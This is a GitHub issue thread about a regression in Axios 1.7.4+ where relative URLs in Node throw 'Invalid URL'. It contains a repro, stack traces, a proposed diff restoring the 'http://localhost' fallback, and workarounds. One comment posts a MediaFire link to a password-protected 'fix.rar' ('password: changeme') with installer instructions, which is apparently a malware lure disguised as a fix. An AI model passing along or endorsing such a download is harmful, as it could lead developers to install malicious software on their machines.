### ISSUE TITLE
Breaking change in Axios 1.7.4 regarding default host in HTTP adapter

### ISSUE THREAD

**Issue by heidemn-faro** [axios/axios#6580]
### Describe the bug

This commit:
https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a#diff-586c04c24608b86a074073c5514cc195be5c4c87ddb56da233f6d998ada4159f 
changed the code from
`const parsed = new URL(fullPath, 'http://localhost');`
to
`const parsed = new URL(fullPath, utils.hasBrowserEnv ? platform.origin : undefined);`.

This can generate an "Invalid URL" error in the URL constructor, since it expects the host to be specified.

### To Reproduce

**Please run "npm install" before trying these;** it seems that codesandbox sometimes shows up with an outdated node_modules folder?!

Not working with:
* 1.7.5: https://codesandbox.io/p/devbox/sharp-dawn-3c7qk4

```
Node version: v18.20.4
Axios version: 1.7.5
node:internal/process/esm_loader:40
      internalBinding('errors').triggerUncaughtException(
                                ^
TypeError [ERR_INVALID_URL]: Invalid URL
```

Working fine with:
* 1.7.3: https://codesandbox.io/p/devbox/objective-booth-98649r

```
Node version: v18.20.4
Axios version: 1.7.3
404
```

### Code snippet

```ts
const instance = new Axios({});
console.log((await instance.get('/relative')).status);
// Axios 1.7.3:  Calls http://localhost/relative
// Axios 1.7.4+: Throws "Invalid URL" from URL constructor
```

### Expected behavior

Would be be acceptable to change the code slightly like this?
```diff
- const parsed = new URL(fullPath, utils.hasBrowserEnv ? platform.origin : undefined);
+ const parsed = new URL(fullPath, utils.hasBrowserEnv ? platform.origin : 'http://localhost');
```

Then it would not be a breaking change for Node environments.
My understanding is that this wouldn't affect the CVE fix, but maybe I'm wrong.

I understand that the fallback to "localhost" is questionable, but still, removing it is a breaking change, so I suggest to delay it until version 2.0.
Your readme contains a section "Semver", which sounds like you would be using semantic versioning.

### Axios Version

1.7.4 and 1.7.5 - No longer working.
1.7.3 - Working,

### Adapter Version

HTTP

### Node.js Version

18.20.4, 20.16.0

### OS

Ubuntu 20.04

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by PritamP20** [comment]
So we should change the line right?, i can work on it

**Comment by sanchezzzhak** [comment]
I am using the server startup in a test environment
Some controllers can only be accessed via localhost + port dynamic

axios version 1.7.5 - wrong Invalid URL
axios version 1.7.7 - wrong Invalid URL

my test
```js
		it('should test collection load', async () => {
		   // getBaseUrl() - http://localhost:219502
			const instance = axios.create({responseType: "text", baseURL: getBaseUrl()});
			const response = await instance.get('/collection-load')
			assert.equal('OK', response.data);
		})
```

```
TypeError: Invalid URL
    at new URL (node:internal/url:775:36)
    at dispatchHttpRequest (node_modules/axios/dist/node/axios.cjs:2770:20)
    at /srv/www/tds/node_modules/axios/dist/node/axios.cjs:2690:5
    at new Promise (<anonymous>)
    at wrapAsync (node_modules/axios/dist/node/axios.cjs:2670:10)
    at http (node_modules/axios/dist/node/axios.cjs:2708:10)
    at Axios.dispatchRequest (node_modules/axios/dist/node/axios.cjs:4135:10)
    at Axios._request (node_modules/axios/dist/node/axios.cjs:4415:33)
    at Axios.request (node_modules/axios/dist/node/axios.cjs:4282:25)
    at Axios.<computed> [as get] (node_modules/axios/dist/node/axios.cjs:4441:17)
    at Function.wrap [as get] (node_modules/axios/dist/node/axios.cjs:28:15)
    at Context.<anonymous> (tests/main.spec.js:251:36)
    at process.processImmediate (node:internal/timers:478:21)
    at Axios.request (node_modules/axios/dist/node/axios.cjs:4287:41)
    at async Context.<anonymous> (tests/main.spec.js:251:21)
```

I guess I'll have to use something else for testing (

**Comment by heidemn-faro** [comment]
Closing this ticket, since no longer important for us.

**Comment by PersistentCloud** [comment]
Please open this ticket again. I have a similar problem with my code. Versions higher than 1.7.3 lead to an answer like the following
`{
  "code": "ERR_INVALID_URL",
  "input": "/api/albums/e0a18214-ef49-4824-863d-af5b26d78ed3"
}`

Following the specific part of my code
`app.use('/albums/:albumId', async (req: Request, res: Response) => {
    const albumId = req.params.albumId
    if (!albumId || !uuidValidate(albumId)) {
        return res.status(400).send("Invalid or missing albumId");
    }
    const url = `${IMMICH_API_BASE_URL}/api/albums/${albumId}`;
    await axios({
        method: "GET",
        url,
        headers: {
            'x-api-key': IMMICH_API_KEY
        }
    }).then(response => {
        res.header(response.headers);
        return res.json(response.data);
    }).catch(error => {
        console.error(`Error proxying request to %s: %s`, url, error);
        res.status(500).json(error);
    });
});`

For this specific case `${IMMICH_API_BASE_URL}` is empty to let my local nginx handle it

**Comment by sanchezzzhak** [comment]
@heidemn-faro Thx.

```
new URL('http://localhost:65000') // success
new URL('http://localhost:66000') // false
```

Everything is correct here.

The maximum port allowed for http/s node modules is about 65k

**Comment by ALuferau** [comment]
This issue still exists on the 1.7.9 and don't allow us to update version of the axios. 

updated: issue solved by adding the axios configuration `axios.defaults.baseURL = 'http://localhost'; ` on unit tests setup.
for now using 1.8.2 and it works as expected;

**Comment by jasonsaayman** [comment]
closing please use the latest version this was a regerssion and i think it was also makred on NPM
